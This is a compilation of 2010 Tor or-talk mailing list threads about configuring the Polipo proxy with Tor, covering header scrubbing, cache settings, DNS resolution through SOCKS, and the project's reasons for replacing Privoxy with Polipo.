no wonder. so there's a downside with https :( thanks guys. On 8/21/10, Robert Ransom rransom.8...@gmail.com wrote: On Sat, 21 Aug 2010 09:39:08 +0800 Trystero Lot lo...@callout.me wrote: still the same. i uncommented and added user-agent censoredHeaders = set-cookie, cookie, cookie2, from,accept-language, user-agent censorReferer = true my header is not clean and in fact shows my OS :( tested using.. https://anonymous-proxy-servers.net/en/anontest As I understand it, Polipo can't scrub the headers of an HTTPS request, even if you use it as an HTTPS proxy. Robert Ransom *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
polipo
it seems the censoredHeaders not working for me. have anyone tried to use this and add useragent? *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo question
does anyone know if there is a config file option to turn off all caching in Polipo? If you look at the Polipo manual, there's an index. If you look at the index, there's an entry for uncachable. If you follow the entry, you'll find the config variable uncachableFile. --jch *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
RE: Polipo question
From: j...@pps.jussieu.fr To: or-talk@freehaven.net Subject: Re: Polipo question Date: Sat, 8 May 2010 18:08:22 +0200 does anyone know if there is a config file option to turn off all caching in Polipo? If you look at the Polipo manual, there's an index. If you look at the index, there's an entry for uncachable. If you follow the entry, you'll find the config variable uncachableFile. --jch Thank you, I have a recollection of reading that section and not really understanding it - I think I would need a good understanding of how caching works and all the directives first. From what I read, you have to know in advance which URLs you don't want cached, and put them in uncachableFile. That's not really practical. But thanks for trying to help. GD _ The New Busy is not the too busy. Combine all your e-mail accounts with Hotmail. http://www.windowslive.com/campaign/thenewbusy?tile=multiaccountocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_4
Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?
I'm not sure whether either of these bugs are fixed at present (ugh). So I'd recommend sticking with yes (or true, I guess it's called now). If yes is the same as true then this is a setting the Polipo manual strongly advises against. Finally, if dnsUseGethostbyname is true, Polipo never tries to speak DNS itself and uses the system resolver straight away (this is not recommended). - Given those, and since polipo shouldn't be doing any dns resolves anyway when it's using a socks5 proxy, I figured I'd go for the choice that exposed less surface area. My fundamental question is this: If the config file says yes to dnsUseGethostbyname then Tor does the DNS resolution. If however the config file says something else e.g. reluctantly (The manual says if it is reluctantly (the default), Polipo tries to speak DNS and falls back to the system resolver if a name server could not be contacted.) then does Polipo do its own DNS resolution and then pass this on to Tor therefore leaking? Or, are you saying, that since polipo shouldn't be doing any dns resolves anyway when it's using a socks5 proxy the value of dnsUseGethostbyname is not relevant when using Polipo with Tor since Tor will ALWAYS do DNS resolution because of socksParentProxy = localhost:9050 and socksProxyType = socks5. If yes then my first question is moot. This is what is confusing me the most - whether changing dnsUseGethostbyname means Polipo (not Tor) now does the DNS resolution. --Roger *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/ *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?
On Thu, Apr 08, 2010 at 04:24:06PM +0100, pump...@cotse.net wrote 2.7K bytes in 64 lines about: The standard Polipo configuration file for Ubuntu located at https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf should replace the configuration file one downloads when Polipo is I believe you mean The standard polipo configuration file for safely using Tor. The standard ubuntu polipo config doesn't use Tor. this setting in the configuration file is not important? Or does Polipo do the DNS resolution before traffic is passed on to Tor in which case the configuration file is crucial? In other words, when is DNS resolved when using Tor and Polipo? In practice, with that config file, dns queries are passed to tor directly for resolution, not being done by polipo nor the actual system resolver. If you change the options, you should see polipo query your local dns resolver either directly, or via gethostbyname. I agree the config needs more clarity and to match an actual option as specified in the info page. I'll add it as a bug to research. This is also the case for TBB, not necessarily so for non-tbb use cases. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://www.torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?
and...@torproject.org wrote: In practice, with that config file, dns queries are passed to tor directly for resolution, not being done by polipo nor the actual system resolver. Thank you for the confirmation. If you change the options, you should see polipo query your local dns resolver either directly, or via gethostbyname. So, the option reluctantly for dnsUseGethostbyname would mean DNS requests are done by Tor and are only done by Polipo if Tor DNS fails or does it mean DNS requests are now done by Polipo usually and only done by the system resolver if Polipo DNS fails? The manual says for reluctantly - Polipo tries to speak DNS and falls back to the system resolver if a name server could not be contacted. I am unclear where it tries to speak DNS - would this be before Tor or would the DNS still get pushed through Tor even though the configuration file has been modified? I agree the config needs more clarity and to match an actual option as specified in the info page. I'll add it as a bug to research. I am still confused regarding what yes actually means - does it refer to the default which is reluctantly or does it mean nothing to Polipo and is just ignored? In which case why not just comment this option out? Thank you for your help! *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?
If you change the options, you should see polipo query your local dns resolver either directly, or via gethostbyname. But if you change it to false would that not be the safest option - from what I can gather in this situation Polipo would never do its own DNS. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?
On Sun, Apr 11, 2010 at 11:14:31PM +0100, Matthew wrote: If you change the options, you should see polipo query your local dns resolver either directly, or via gethostbyname. But if you change it to false would that not be the safest option - from what I can gather in this situation Polipo would never do its own DNS. As I understand it, the question is whether polipo should use the system call named gethostbyname(), or if it should use its own internal non-blocking dns resolve code. The question isn't should polipo disable dns resolves or not. Back when I picked the yes answer, there were two reasons: A) polipo's internal dns resolve code didn't look at /etc/hosts, so when I set my proxy to localhost:9050, polipo would try to resolve localhost, and it ended up asking my ISP where localhost was. My ISP helpfully answered 127.0.0.1, but what if my ISP had answered something else? Really bad news. B) There were some remote buffer overflows in polipo's internal dns resolve code. Given those, and since polipo shouldn't be doing any dns resolves anyway when it's using a socks5 proxy, I figured I'd go for the choice that exposed less surface area. I'm not sure whether either of these bugs are fixed at present (ugh). So I'd recommend sticking with yes (or true, I guess it's called now). --Roger *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Polipo and dnsUseGethostbyname - what is the best option and does it matter?
Hello, The standard Polipo configuration file for Ubuntu located at https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf should replace the configuration file one downloads when Polipo is installed according to http://www.torproject.org/docs/tor-doc-unix.html.en. The Polipo configuration from https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf says: # Uncomment this to disable Polipo's DNS resolver and use the system's # default resolver instead. If you do that, Polipo will freeze during # every DNS query: dnsUseGethostbyname = yes However, section 3.9 of the Polipo manual says: Polipo usually tries to speak the DNS protocol itself rather than using the system re- solver5 . Its precise behaviour is controlled by the value of dnsUseGethostbyname. If dnsUseGethostbyname is false, Polipo never uses the system resolver. If it is reluctantly (the default), Polipo tries to speak DNS and falls back to the system resolver if a name server could not be contacted. If it is happily, Polipo tries to speak DNS, and falls back to the system resolver if the host couldn’t be found for any reason (this is not a good idea for shared proxies). Finally, if dnsUseGethostbyname is true, Polipo never tries to speak DNS itself and uses the system resolver straight away (this is not recommended). Three questions: First, since yes is not one of the four options listed in 3.9 what does this mean? I was using yes for many months without realizing it was not an option. How does Polipo use yes? Why is this in the config file? Second, surely the best option is false. That way even if there is a problem with Polipo's DNS it will not use the local DNS as listed in resolv.conf. Some people might say: put OpenDNS in resolv.conf. However, I am on an academic network which does not permit me to modify the DNS; changing resolv.conf means I have no connection. (I know about the dnsNameServer option but let's leave that for now). Third, I always use Polipo with Tor. Even if dnsUseGethostbyname is set to yes or any of the four valid options does this matter? Are DNS requests passed through Polipo to Tor and then Tor does its DNS resolution (after the final exit node if I understand correctly?) so this setting in the configuration file is not important? Or does Polipo do the DNS resolution before traffic is passed on to Tor in which case the configuration file is crucial? In other words, when is DNS resolved when using Tor and Polipo? Thanks. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
RE: Polipo question
Subject: Re: Polipo question From: incoming.li...@ax11.de To: or-talk@freehaven.net Date: Thu, 1 Apr 2010 23:10:09 +0200 Am Donnerstag, den 18.03.2010, 23:35 -0400 schrieb downie -: Hi, does anyone know if there is a config file option to turn off all caching in Polipo? I am having a problem with variable PHP pages being cached, and would prefer not to have to add Cache-Control headers everywhere. The manual doesn't seem to allow for that eventuality. downie Have you tried connecting to http://localhost:8123/polipo/config? (and setting CacheDir to /dev/null there if nothing else works) Cheers, Tom Hi, Polipo is on port 8118 for Tor: anyhow, Firefox won't connect to localhost - it's 'restricted'. Also disc cacheing is off already (critical for privacy), it's the memory cache that is still a problem. downie _ The New Busy think 9 to 5 is a cute idea. Combine multiple calendars with Hotmail. http://www.windowslive.com/campaign/thenewbusy?tile=multicalendarocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_5
Re: Polipo question
On Fri, Apr 02, 2010 at 12:56:25PM -0400, downie - wrote: I am having a problem with variable PHP pages being cached, and would prefer not to have to add Cache-Control headers everywhere. The manual doesn't seem to allow for that eventuality. I believe the answer is that you can't turn off caching. It's core to what polipo does. But perhaps Chris or Juliusz will contradict me. Polipo is on port 8118 for Tor: anyhow, Firefox won't connect to localhost - it's 'restricted'. My guess is that's actually Torbutton preventing you from reaching port 8118 or port 8123, not Firefox preventing you from reaching localhost. http://kb.mozillazine.org/Network.security.ports.banned https://www.torproject.org/torbutton/design/#browseroverlay --Roger *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo question
Am Donnerstag, den 18.03.2010, 23:35 -0400 schrieb downie -: Hi, does anyone know if there is a config file option to turn off all caching in Polipo? I am having a problem with variable PHP pages being cached, and would prefer not to have to add Cache-Control headers everywhere. The manual doesn't seem to allow for that eventuality. downie Have you tried connecting to http://localhost:8123/polipo/config? (and setting CacheDir to /dev/null there if nothing else works) Cheers, Tom *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Polipo/Tor error messages, sdfetch, LEAK
I'm running some automated widgets that connect to various onions. The breakdown of 702 Polipo connects across about as many onions is: a 85 ok b 1 ERROR 504: Connect to onion failed: General SOCKS server failure. c 9 ERROR 504: Connect to onion failed: SOCKS connection not allowed. d 99 ERROR 504: Connect to onion failed: SOCKS error: TTL expired. e 5 ERROR 504: Connect to onion failed: SOCKS error: connection refused. f 503 ERROR 504: Connect to onion failed: SOCKS error: host unreachable. The breakdown of approximately the same set of Tor connects is: g 531 Closing stream for '[scrubbed].onion': hidden service is unavailable (try again later). h 1 Tried for 120 seconds to get a connection to [scrubbed]:LEAK. Giving up. i 5 Tried for 120 seconds to get a connection to [scrubbed]:LEAK. Giving up. (waiting for circuit) j 250 Tried for 120 seconds to get a connection to [scrubbed]:LEAK. Giving up. (waiting for rendezvous desc) Note the port LEAK above can identify the onion if that onion is using a unique port from most of the other onions. Anyways... h) Tor should not give up without emitting a reason. f and g) So this means there was no descriptor in the directories? ie: blahblahblahblah.onion b and c) I figure this is a local problem, maybe with the Polipo/Tor connection. d and i) Does this mean that the onion is there and up but something in the path or the terminating service is broken? e) Is the hidden service on the host up but the userland daemon (httpd, etc) down? j) This seems to be an actual Tor issue in getting a response from the directories that could be fixed? I've noticed that some of the other 504 types will change to 'unreachable' upon subsequent connection attempts. However that is not always the case. Can the timeouts for the 'TTL' and 'waiting for' issues be bumped? Also, does anyone have an update to sdfetch that works with the current stable or alpha trunks? *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo question
On Thu, Mar 18, 2010 at 11:35:49PM -0400, downgeo...@hotmail.com wrote 1.8K bytes in 53 lines about: : does anyone know if there is a config file option to turn off all caching in Polipo? I think you have to compile it without caching. Have you tried setting chunkhighmark and objecthighmark to 0? -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://www.torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
RE: Polipo question
Date: Sat, 20 Mar 2010 10:52:28 -0400 From: and...@torproject.org To: or-talk@freehaven.net Subject: Re: Polipo question On Thu, Mar 18, 2010 at 11:35:49PM -0400, downgeo...@hotmail.com wrote 1.8K bytes in 53 lines about: : does anyone know if there is a config file option to turn off all caching in Polipo? I think you have to compile it without caching. Have you tried setting chunkhighmark and objecthighmark to 0? Thanks for the suggestion; I don't compile myself. /Applications/Vidalia.app/Contents/Resources/polipo.conf:62: unknown config variable diskCacheRoot /Applications/Vidalia.app/Contents/Resources/polipo.conf:71: unknown config variable localDocumentRoot Impossibly low objectHighMark -- setting to 16 almost but not quite :-/ it's still caching small files at least. _ The New Busy is not the old busy. Search, chat and e-mail from your inbox. http://www.windowslive.com/campaign/thenewbusy?ocid=PID27925::T:WLMTAGL:ON:WL:en-US:WM_HMP:032010_3
Polipo question
Hi, does anyone know if there is a config file option to turn off all caching in Polipo? I am having a problem with variable PHP pages being cached, and would prefer not to have to add Cache-Control headers everywhere. The manual doesn't seem to allow for that eventuality. downie _ The New Busy is not the old busy. Search, chat and e-mail from your inbox. http://www.windowslive.com/campaign/thenewbusy?ocid=PID27925::T:WLMTAGL:ON:WL:en-US:WM_HMP:032010_3
Re: Polipo automatic?
Thank you very much. -Original Message- From: downie - downgeo...@hotmail.com To: Or-talk or-talk@freehaven.net Sent: Sat, Mar 13, 2010 10:22 am Subject: RE: Polipo automatic? To: or-talk@freehaven.net Subject: Polipo automatic? Date: Fri, 12 Mar 2010 21:50:23 -0500 From: zzzjethro...@email2me.net Hi. Just read a post made me think of this: On Mac 10.5.2, with the Vidalia/Bundle, does Polipo automatically run after starting Vidalia or do I have to start it separately? I think it's now Polipo rather than Privoxy for v 0.2.1.24-0.2.7? thanks Certainly with the OSX Vidalia bundle I downloaded, it was enabled already: it's an option in Vidalia/Control Panle/Settings. downie Hotmail: Trusted email with Microsoft’s powerful SPAM protection. Sign up now.=
Polipo automatic?
Hi. Just read a post made me think of this: On Mac 10.5.2, with the Vidalia/Bundle, does Polipo automatically run after starting Vidalia or do I have to start it separately? I think it's now Polipo rather than Privoxy for v 0.2.1.24-0.2.7? thanks
RE: Polipo automatic?
To: or-talk@freehaven.net Subject: Polipo automatic? Date: Fri, 12 Mar 2010 21:50:23 -0500 From: zzzjethro...@email2me.net Hi. Just read a post made me think of this: On Mac 10.5.2, with the Vidalia/Bundle, does Polipo automatically run after starting Vidalia or do I have to start it separately? I think it's now Polipo rather than Privoxy for v 0.2.1.24-0.2.7? thanks Certainly with the OSX Vidalia bundle I downloaded, it was enabled already: it's an option in Vidalia/Control Panle/Settings. downie _ Hotmail: Trusted email with Microsoft’s powerful SPAM protection. http://clk.atdmt.com/GBL/go/210850552/direct/01/
Re: why polipo?
How does one, or rather I, do this switch on my Mac 10.5.2 ppc? Thanks and should I? -Original Message- From: Andrew Lewman and...@torproject.org To: or-talk@freehaven.net Sent: Sat, Feb 20, 2010 8:32 am Subject: Re: why polipo? On 02/15/2010 12:09 PM, Michael Gomboc wrote: Why is polipo used and no longer privoxy? The first question is, why a http proxy at all? The answer is, because Firefox SOCKS layer has hard-coded timeouts, and other issues, https://bugzilla.mozilla.org/show_bug.cgi?id=280661. Personally, I don't use an http proxy, I simply let my browser talk to tor via socks directly. The user experience sucks, because you'll receive untold numbers of The connection has timed out warnings, because firefox won't wait for Tor to build a circuit. Chrome, Safari, and Arora (amongst others) don't have this problem. Once Firefox fixes bug 280661, we don't need a http proxy at all. However, given the current pace of progress on 280661, we may switch to Chrome before the fix occurs. The second question is, why switch from privoxy to polipo? Privoxy is fine filtering software that works well for what is it intended to do. However, it's user experience is lacking due to it lacking a few features, namely, http 1.1 pipelining, caching most requested objects, and it needs to see the entire page to parse it, before sending it on to the browser. Lack of these three features is the reason we switched from privoxy to polipo. We've received plenty of feedback that browsing with polipo in place of privoxy feels faster. The feedback indicates that because polipo streams the content to the browser for rendering nearly as fast as it receives it from Tor, the user understands what's going on and will start to read the web page as it loads. Privoxy, necesarily, will load the entire page, parse it for items to be filtered, and then send the page on to the browser. The user experience, especially on a slow circuit, is that nothing happens, the browser activity icon spins forever, and suddenly a page appears many, many seconds later. If Tor was vastly faster, privoxy's mode of operation wouldn't matter. We're working on making Tor faster. However, purposely showing the user how slow tor can be with privoxy was a huge point of complaint, and not what we intended to do. Does polipo have some bugs? Sure. Chrisd primarily, among others, is working on fixing them. At the current rate of progress on firefox bug 280661, we'll have polipo fixed before mozilla releases the SOCKS layer fix. Chrisd even wrote Mozilla a patch and submitted it on the bug. The final point is that this is all free software. You are in control. If you don't like polipo, but do like privoxy, then don't install polipo and use privoxy. The power of choice is yours. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
Thank you Andrew for the nice explication! 2010/2/19 Andrew Lewman and...@torproject.org On 02/15/2010 12:09 PM, Michael Gomboc wrote: Why is polipo used and no longer privoxy? The first question is, why a http proxy at all? The answer is, because Firefox SOCKS layer has hard-coded timeouts, and other issues, https://bugzilla.mozilla.org/show_bug.cgi?id=280661. Personally, I don't use an http proxy, I simply let my browser talk to tor via socks directly. The user experience sucks, because you'll receive untold numbers of The connection has timed out warnings, because firefox won't wait for Tor to build a circuit. Chrome, Safari, and Arora (amongst others) don't have this problem. Once Firefox fixes bug 280661, we don't need a http proxy at all. However, given the current pace of progress on 280661, we may switch to Chrome before the fix occurs. The second question is, why switch from privoxy to polipo? Privoxy is fine filtering software that works well for what is it intended to do. However, it's user experience is lacking due to it lacking a few features, namely, http 1.1 pipelining, caching most requested objects, and it needs to see the entire page to parse it, before sending it on to the browser. Lack of these three features is the reason we switched from privoxy to polipo. We've received plenty of feedback that browsing with polipo in place of privoxy feels faster. The feedback indicates that because polipo streams the content to the browser for rendering nearly as fast as it receives it from Tor, the user understands what's going on and will start to read the web page as it loads. Privoxy, necesarily, will load the entire page, parse it for items to be filtered, and then send the page on to the browser. The user experience, especially on a slow circuit, is that nothing happens, the browser activity icon spins forever, and suddenly a page appears many, many seconds later. If Tor was vastly faster, privoxy's mode of operation wouldn't matter. We're working on making Tor faster. However, purposely showing the user how slow tor can be with privoxy was a huge point of complaint, and not what we intended to do. Does polipo have some bugs? Sure. Chrisd primarily, among others, is working on fixing them. At the current rate of progress on firefox bug 280661, we'll have polipo fixed before mozilla releases the SOCKS layer fix. Chrisd even wrote Mozilla a patch and submitted it on the bug. The final point is that this is all free software. You are in control. If you don't like polipo, but do like privoxy, then don't install polipo and use privoxy. The power of choice is yours. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/ -- Michael Gomboc www.viajando.at pgp-id: 0x5D41FDF8
Re: why polipo?
On 19 February 2010 20:32, Andrew Lewman and...@torproject.org wrote: Once Firefox fixes bug 280661, we don't need a http proxy at all. However, given the current pace of progress on 280661, we may switch to Chrome before the fix occurs. If the switch to Chrome was made, I assume that there'd be a port of the TorButton extension to Chrome? If that does happen, a nice feature for the Tor/!Tor switch would be to have Tor used only in incognito mode. I'm not sure how you make extensions work in incognito mode, but I'm sure that I'm not alone in wanting this feature.
Re: why polipo?
On 02/20/2010 03:36 AM, zzzjethro...@email2me.net wrote: How does one, or rather I, do this switch on my Mac 10.5.2 ppc? Thanks and should I? Should you switch? I cannot answer that. How to switch? I can answer that at a high-level. Install privoxy from http://www.privoxy.org/, reconfigure Vidalia to not start a http proxy, and configure privoxy to point at tor as a socks server. Search engines should be able to find you many walkthrough in far greater detail than that. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andrew Lewman wrote: Chrisd even wrote Mozilla a patch and submitted it on the bug. cool, do you apply the patch to windows tor bundles? if not, it could be worth to be applied :) on the other side, I've mixed feelings regarding the possible switch from firefox to chrome or any other browser but if this will help spreading Tor, I'll more than gladly welcome it - -- Marco Bonetti Tor research and other stuff: http://sid77.slackware.it/ Slackintosh Linux Project Developer: http://workaround.ch/ Linux-live for powerpc: http://workaround.ch/pub/rsync/mb/linux-live/ My GnuPG key id: 0x0B60BC5F -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuATQ8ACgkQTYvJ9gtgvF/bvACg733KJWya05sICIfOPeAKb4XI mrQAn2dfqwvc00+H1DN9Hv9QhSvodyC+ =tf3g -END PGP SIGNATURE- *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
On 02/20/2010 12:38 PM, Flamsmark wrote: Once Firefox fixes bug 280661, we don't need a http proxy at all. However, given the current pace of progress on 280661, we may switch to Chrome before the fix occurs. If the switch to Chrome was made, I assume that there'd be a port of the TorButton extension to Chrome? If that does happen, a nice feature for the Tor/!Tor switch would be to have Tor used only in incognito mode. I'm not sure how you make extensions work in incognito mode, but I'm sure that I'm not alone in wanting this feature. I should clarify that by Chrome, I really mean Chromium, the free and open source version of Chrome; http://code.google.com/chromium/. We'd like to stop eviscerating Firefox with Torbutton. Rather, we could integrate torbutton functionality into private/incognito browsing mode. Chromium is relatively new, and we're working with the team to implement the APIs necessary to integration of a truly anonymous/private browsing mode. We'd also like to work with Mozilla on the same pathway, but so far we haven't made the right connections in the organization to have this happen. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
On 02/20/2010 03:58 PM, Marco Bonetti wrote: Andrew Lewman wrote: Chrisd even wrote Mozilla a patch and submitted it on the bug. cool, do you apply the patch to windows tor bundles? if not, it could be worth to be applied :) No, we don't build our own Firefox yet. I've been resisting adding Tor's firefox to the list of software we maintain and build every release. However, yes it may become worthwhile to build our own Firefox, and integrate Chrisd's patch. on the other side, I've mixed feelings regarding the possible switch from firefox to chrome or any other browser but if this will help spreading Tor, I'll more than gladly welcome it I have mixed feelings as well. Chromium/chrome has a nice sandboxing model, is very fast at rendering, and in general is a nice browser. It's new enough that by implementing some api's for us, we can integrate torbutton functionality into it far easier than the current reverse engineering we have to do with firefox. Alternatives could be like torfox and torora, where you just build the browser from the start with Tor in mind. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
Dealing with Chromium devs on incognito integratio is a great idea. While we're discussing the bundle, I'd like to mention something that's been on my mind lately. I recently ran a Privacy Tech Workshop at the Students for Free Culture conference in DC - and the general conclusion is that Tor/FF is too hard to use and set up (and I think that this has been the conclusion from the folks at the OpenNetInitiative at Harvard about the real-world usage of censorship resisting tools in Iran and such) and that most people end up using the first result on whatever search engine for get around blocked internet, etc, which ends up using a webproxy. So - Tor needs to be easier to use. The solution that we decided we'd like to see is a stand-alone Tor client - essentially a version of FF with Tor natively, invisibly integrated without any long-standing background services (a single executable to launch all of the necessary components and close them down when the browser quits). This could be published as SafeBrowser or something obvious like that. As a group we decided we'd like to work on producing that, although I don't have much free time in the next few weeks and already have numerous projects on my plate. Still, I do plan on following up with that, just thought you might be interested in the idea. Rich http://www.anomos.info On Sat, Feb 20, 2010 at 4:15 PM, Andrew Lewman and...@torproject.org wrote: On 02/20/2010 03:58 PM, Marco Bonetti wrote: Andrew Lewman wrote: Chrisd even wrote Mozilla a patch and submitted it on the bug. cool, do you apply the patch to windows tor bundles? if not, it could be worth to be applied :) No, we don't build our own Firefox yet. I've been resisting adding Tor's firefox to the list of software we maintain and build every release. However, yes it may become worthwhile to build our own Firefox, and integrate Chrisd's patch. on the other side, I've mixed feelings regarding the possible switch from firefox to chrome or any other browser but if this will help spreading Tor, I'll more than gladly welcome it I have mixed feelings as well. Chromium/chrome has a nice sandboxing model, is very fast at rendering, and in general is a nice browser. It's new enough that by implementing some api's for us, we can integrate torbutton functionality into it far easier than the current reverse engineering we have to do with firefox. Alternatives could be like torfox and torora, where you just build the browser from the start with Tor in mind. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talk in the body. http://archives.seul.org/or/talk/ *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
On 02/20/2010 04:41 PM, Rich Jones wrote: While we're discussing the bundle, I'd like to mention something that's been on my mind lately. I recently ran a Privacy Tech Workshop at the Students for Free Culture conference in DC - and the general conclusion is that Tor/FF is too hard to use and set up (and I think that this has been the conclusion from the folks at the OpenNetInitiative at Harvard about the real-world usage of censorship resisting tools in Iran and such) and that most people end up using the first result on whatever search engine for get around blocked internet, etc, which ends up using a webproxy. This is why the Tor Browser Bundle exists, http://www.torproject.org/torbrowser/. It's self-contained and pre-configured. Just download, extract, and run. There's no configuration needed. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
Egg -- My face Well done, guys. R On Sat, Feb 20, 2010 at 4:57 PM, Andrew Lewman and...@torproject.org wrote: On 02/20/2010 04:41 PM, Rich Jones wrote: While we're discussing the bundle, I'd like to mention something that's been on my mind lately. I recently ran a Privacy Tech Workshop at the Students for Free Culture conference in DC - and the general conclusion is that Tor/FF is too hard to use and set up (and I think that this has been the conclusion from the folks at the OpenNetInitiative at Harvard about the real-world usage of censorship resisting tools in Iran and such) and that most people end up using the first result on whatever search engine for get around blocked internet, etc, which ends up using a webproxy. This is why the Tor Browser Bundle exists, http://www.torproject.org/torbrowser/. It's self-contained and pre-configured. Just download, extract, and run. There's no configuration needed. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talk in the body. http://archives.seul.org/or/talk/ *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: why polipo?
On 02/15/2010 12:09 PM, Michael Gomboc wrote: Why is polipo used and no longer privoxy? The first question is, why a http proxy at all? The answer is, because Firefox SOCKS layer has hard-coded timeouts, and other issues, https://bugzilla.mozilla.org/show_bug.cgi?id=280661. Personally, I don't use an http proxy, I simply let my browser talk to tor via socks directly. The user experience sucks, because you'll receive untold numbers of The connection has timed out warnings, because firefox won't wait for Tor to build a circuit. Chrome, Safari, and Arora (amongst others) don't have this problem. Once Firefox fixes bug 280661, we don't need a http proxy at all. However, given the current pace of progress on 280661, we may switch to Chrome before the fix occurs. The second question is, why switch from privoxy to polipo? Privoxy is fine filtering software that works well for what is it intended to do. However, it's user experience is lacking due to it lacking a few features, namely, http 1.1 pipelining, caching most requested objects, and it needs to see the entire page to parse it, before sending it on to the browser. Lack of these three features is the reason we switched from privoxy to polipo. We've received plenty of feedback that browsing with polipo in place of privoxy feels faster. The feedback indicates that because polipo streams the content to the browser for rendering nearly as fast as it receives it from Tor, the user understands what's going on and will start to read the web page as it loads. Privoxy, necesarily, will load the entire page, parse it for items to be filtered, and then send the page on to the browser. The user experience, especially on a slow circuit, is that nothing happens, the browser activity icon spins forever, and suddenly a page appears many, many seconds later. If Tor was vastly faster, privoxy's mode of operation wouldn't matter. We're working on making Tor faster. However, purposely showing the user how slow tor can be with privoxy was a huge point of complaint, and not what we intended to do. Does polipo have some bugs? Sure. Chrisd primarily, among others, is working on fixing them. At the current rate of progress on firefox bug 280661, we'll have polipo fixed before mozilla releases the SOCKS layer fix. Chrisd even wrote Mozilla a patch and submitted it on the bug. The final point is that this is all free software. You are in control. If you don't like polipo, but do like privoxy, then don't install polipo and use privoxy. The power of choice is yours. -- Andrew Lewman The Tor Project pgp 0x31B0974B Website: https://torproject.org/ Blog: https://blog.torproject.org/ Identi.ca: torproject *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
polipo problems
